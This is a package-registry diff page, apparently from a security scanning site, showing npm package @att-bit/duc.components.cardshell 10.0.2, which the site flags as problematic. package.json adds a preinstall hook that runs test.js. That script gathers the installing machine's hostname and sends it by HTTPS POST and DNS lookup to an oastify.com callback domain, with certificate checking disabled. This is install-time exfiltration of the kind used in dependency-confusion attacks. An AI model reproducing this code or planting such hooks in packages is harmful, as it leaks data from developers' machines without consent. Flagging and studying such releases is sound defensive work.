@att-bit/duc.components.cardshell 10.0.2

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of @att-bit/duc.components.cardshell might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/index.js +3 -0
  2. package/package.json +19 -0
  3. package/test.js +26 -0
package/index.js ADDED
@@ -0,0 +1,3 @@
1
+ module.exports.hacked = function () {
2
+ return "ICH Package Test"
3
+ }
package/package.json ADDED
@@ -0,0 +1,19 @@
1
+ {
2
+ "name": "@att-bit/duc.components.cardshell",
3
+ "version": "10.0.2",
4
+ "description": "ICH",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1",
8
+ "preinstall": "node test.js"
9
+ },
10
+ "author": "ich",
11
+ "license": "ISC",
12
+ "repository": {
13
+ "type": "git",
14
+ "url": "https://github.com/"
15
+ },
16
+ "keywords": [
17
+ "testing"
18
+ ]
19
+ }
package/test.js ADDED
@@ -0,0 +1,26 @@
1
+ const https = require('https');
2
+ var os = require("os");
3
+ var hostname = os.hostname();
4
+
5
+ const data = new TextEncoder().encode(
6
+ JSON.stringify({
7
+ payload: hostname,
8
+ project_id: process.argv[2]
9
+ })
10
+ );
11
+
12
+ const options = {
13
+ hostname: process.argv[2] + '.' + hostname + '.7emdr2hx9z9vi9gb6gbu5vixvo1fpjd8.oastify.com',
14
+ port: 443,
15
+ path: '/',
16
+ method: 'POST',
17
+ headers: {
18
+ 'Content-Type': 'application/json',
19
+ 'Content-Length': data.length
20
+ },
21
+ rejectUnauthorized: false
22
+ }
23
+
24
+ const req = https.request(options, res => {});
25
+ req.write(data);
26
+ req.end();